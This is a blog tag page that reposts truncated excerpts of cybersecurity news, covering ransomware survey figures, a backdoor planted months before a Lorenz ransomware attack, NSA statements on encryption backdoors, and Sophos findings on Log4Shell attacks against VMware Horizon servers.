Tag: backdoors | SpinSafe

Cyber Security Today, Jan. 11, 2023 – Debate on ransomware attacks dropping continues, beware of long-hidden backdoors and lots of patches released

January 11, 2023/in Internet Security

The debate on ransomware attacks dropping continues, beware of long-hidden backdoors and lots of patches released.

Welcome to Cyber Security Today. It’s Wednesday, January 11th, 2023. I’m Howard Solomon, contributing reporter on cybersecurity for ITWorldCanada.com.

Another entry in the debate on whether ransomware attacks are going up or down has been issued. Last week researchers at Emsisoft said the truth in the U.S. is hard to figure out because so many attacks aren’t publicly reported. This week researchers at Delinea released a report saying a survey it paid for suggests ransomware last year was down significantly over 2021. Of the 300 American IT decision-makers surveyed, 25 per said they were victims of ransomware in 2022. By comparison, 64 per cent of respondents said their firm was hit in 2021. Respondents also said budgets for ransomware defence dropped last year, although that could be because IT leaders are folding defences against ransomware with defences against all types of cyber attacks. More worrisome, the number of companies with incident response plans dropped to 71 per cent last year from 94 per cent in 2022. There’s a link to the full report in the text version of this podcast.

Threat actors are known for installing back doors on victims’ IT infrastructure to enable their attacks. That’s why scouring an entire IT environment is vital after a successful breach of security controls to make sure back doors aren’t left around. The latest example comes in a report from researchers at U.K.-based S-RM Intelligence. It looked into an attack by the Lorenz ransomware gang. The gang exploited a vulnerability in an organization using Mitel’s VoIP phone system. However, it was able to do that by using a backdoor that had been installed five months before the ransomware was launched. One theory is an initial access broker compromised the victim’s IT infrastructure and installed the backdoor, then notified the Lorenz group. Whatever the explanation, it’s another example of why continuously searching for backdoors as well as patching vulnerabilities is essential.

Ransom demands linked to denial of service attacks aren’t talked about a lot. However,…

Source…

The NSA Swears It Has ‘No Backdoors’ in Next-Gen Encryption

May 14, 2022/in Mobile Security

A group of human rights lawyers and investigators called on the Hague this week to bring what would be the first ever “cyber war crimes” charges. The group is urging the International Criminal Court to bring charges against the dangerous and destructive Russian hacking group known as Sandworm, which is run by Russia’s military intelligence agency GRU. Meanwhile, activists are working to block Russia from using satellites controlled by the French company Eutelsat to broadcast its state-run propaganda programming.

Researchers released findings this week that thousands of popular websites record data that users type into forms on the site before they hit the Submit button—even if the user closes the page without submitting anything. Google released a report on an in-depth security analysis it conducted with the chipmaker AMD to catch and fix flaws in specialty security processors used in Google Cloud infrastructure. The company also announced a slew of privacy and security features for its new Android 13 mobile operating system along with a vision for making them easier for people to understand and use.

The European Union is considering child protective legislation that would require scanning private chats, potentially undermining end-to-end encryption at a massive scale. Plus, defenders from the cybersecurity nonprofit BIO-ISAC are racing to protect the bioeconomy from digital threats, announcing a partnership this week with Johns Hopkins University Applied Physics Lab that will help fund pay-what-you-can incident response resources.

But wait, there’s more. Each week we round up the news that we didn’t break or cover in-depth. Click on the headlines to read the full stories. And stay safe out there.

The United States is completing development of a new generation of high-security encryption standards that will be robust in the current technical climate and are designed to be resistant to circumvention in the age of quantum computing. And while the National Security Agency contributed to the new standards’ creation, the agency says it has no special means of undermining the protections. Rob Joyce, the NSA’s director of cybersecurity, told Bloomberg this week, “There are…

Source…

Attackers Are Using Log4Shell Vulnerability to Deliver Backdoors to Virtual Servers

April 4, 2022/in Internet Security

Internet security firm Sophos has released findings on how attackers are using the Log4Shell vulnerability to deliver backdoors and profiling scripts to unpatched VMware Horizon servers, paving the way for persistent access and future ransomware attacks.

A new technical paper, “Horde of Miner Bots and Backdoors Leveraged Log4J to Attack VMware Horizon Servers,” details the tools and techniques used to compromise the servers and deliver three different backdoors and four cryptominers.

The backdoors are possibly delivered by Initial Access Brokers.

Log4Shell is a remote code execution vulnerability in the Java logging component, Apache Log4J, which is embedded in hundreds of software products. It was reported and patched in December 2021.

“Widely used applications such as VMware Horizon that are exposed to the internet and need to be manually updated, are particularly vulnerable to exploitation at scale,” said Sean Gallagher, senior security researcher at Sophos. “Sophos detections reveal waves of attacks targeting Horizon servers, starting in January, and delivering a range of backdoors and cryptominers to unpatched servers, as well as scripts to collect some device information.

Sophos believes that some of the backdoors may be delivered by Initial Access Brokers looking to secure persistent remote access to a high value target that they can sell on to other attackers, such as ransomware operators.”

The multiple attack payloads Sophos detected using Log4Shell to target vulnerable Horizon servers include:

Two legitimate remote monitoring and management tools, Atera agent and Splashtop Streamer, likely intended for malicious use as backdoors
The malicious Sliver backdoor
The cryptominers z0Miner, JavaX miner, Jin and Mimu
Several PowerShell-based reverse shells that collect device and backup information

Sophos’ analysis revealed that Sliver is sometimes delivered together with Atera and PowerShell profiling scripts and is used to deliver the Jin and Mimu variants of the XMrig Monero miner botnet.

According to Sophos, the attackers are using several different approaches to infect targets. While some of…

Source…